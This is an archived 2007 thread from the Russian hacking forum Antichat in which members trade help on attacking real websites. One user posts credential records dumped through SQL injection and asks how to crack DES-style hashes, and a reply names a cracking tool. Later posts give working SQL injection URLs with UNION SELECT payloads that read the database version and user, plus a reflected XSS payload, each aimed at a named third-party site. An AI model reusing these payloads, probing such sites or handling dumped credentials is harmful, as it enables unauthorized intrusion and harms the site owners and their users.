Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.11.2007, 16:42
|
|
Новичок
Регистрация: 28.10.2007
Сообщений: 11
Провел на форуме:
86145
Репутация:
12
|
|
Т.к. я начинающий, то в процессе обучения возник вопрос 
Вскрыл сайт с SI, добыл следующую инфу:
таблица 1:
access_code,firstname,lastname,password
123800876,Adam,Smith,bigdog (из MD5)
таблица 2:
name,is_superuser,api_password,password
Adam Smith,1,NhaXbNfmzppAE,fsH1sRBI6rLuQ
С первой таблицей все ясно - ее данные подходят к входу на форум, но не подходят к админке  Не могу понять, к чему относятся данные из второй таблицы. Особенно интересуют поля api_password и password. Вопрос: хешированы они или нет? Если хешированы, то чем можно их забрутить? Что такое access_code? И последний вопрос - к чему могут относиться данные из второй таблицы?
Доп.инфа: в первой таблице юзверей более 2 тысяч, во второй - пяток. |
|
|
04.11.2007, 17:07
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Это DES (13 симв)... password- это понятно (хотя несовсем)... api_password - возможно это
admin panel interface тоесть админка... password-это допустим доступ к сайту, api_password - это пароль доступа в админку...
может быть api_password - это ключ шифрования DES-хеша, а password - это зашифрованный ключем api_password хеш пароля
хотя врядли все так сложно, т.ч. скорей всего первый вариант
__________________
Карфаген должен быть разрушен...
|
|
|
|
04.11.2007, 17:16
|
|
Новичок
Регистрация: 28.10.2007
Сообщений: 11
Провел на форуме:
86145
Репутация:
12
|
|
Сообщение от Scipio
Это DES (13 симв)
Спасибо за подсказку. А DES чем-нибудь брутится? Может онлайн-сервисы какие есть?
|
|
|
|
04.11.2007, 17:20
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от HornetBlack
Спасибо за подсказку. А DES чем-нибудь брутится? Может онлайн-сервисы какие есть?
Онлайн незнаю, скорее их нет, а вот passwordpro 2.2.6 точно брутит
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 00:43
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
PHP код:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,3,4/*
как посмотреть версию бд? там походу фильтрация какая-то странная... это одна из моих первых скулей =))
и еще
PHP код:
http://www.haber20.net/news_page.php?m=1&id=-2541
там выводится id. что-то можно с этим сделать?
и вот еще. что здесь?
PHP код:
http://www.atn-night-vision.com/news_page.php?id=-2%20union+select+1,2,3,4,5/*
аналогично
PHP код:
http://jdbasketball.com/news_page.php?id=14'
Последний раз редактировалось Piflit; 05.11.2007 в 00:58..
|
|
|
|
05.11.2007, 00:46
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от Piflit
PHP код:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,3,4/*
как посмотреть версию бд? там походу фильтрация какая-то странная... это одна из моих первых скулей =)) http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,convert(version()+using+cp12 51),4/*
кодировка^
|
|
|
|
05.11.2007, 00:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Piflit
PHP код:
http://www.haber20.net/news_page.php?m=1&id=-2541
там выводится id. что-то можно с этим сделать? там скули нет, там пассивная XSS
Код:
http://www.haber20.net/news_page.php?m=1&id=2542%3Cscript%3Ealert(121212121)%3C/script%3E
насчет скули, наряду с вариантом ice1k`a возможен еще такой вариант:
Код:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 01:02
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
aes_decrypt(aes_encrypt(user(),0x71),0x71)
почему это прокатывает? это шифрование типа ксора?
|
|
|
|
05.11.2007, 02:31
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Piflit
aes_decrypt(aes_encrypt(user(),0x71),0x71)
почему это прокатывает? это шифрование типа ксора?
Нет, это шифрование типа AES, вернее точно AES...
получается так, что ты шифруешь данные user() (функция aes_encrypt() ) с ключем 0x71, а потом сразуже расшифровываешь то что зашифровал(функция aes_decrypt() ) c этим же ключем, и в используемой кодировке
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 04:18
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
у меня еще несколько вопросов.
1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
тут просто ошибка скрипта, а скуля нет, так?
2. когда надо ставить перед значением параметра минус, а когда кавычку после?
3. что можно сделать, кроме брута, если версия бд меньше 5?
ЗЫ пост http://forum.antichat.ru/showpost.php?p=497322&postcount=251 все еще актуален =)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
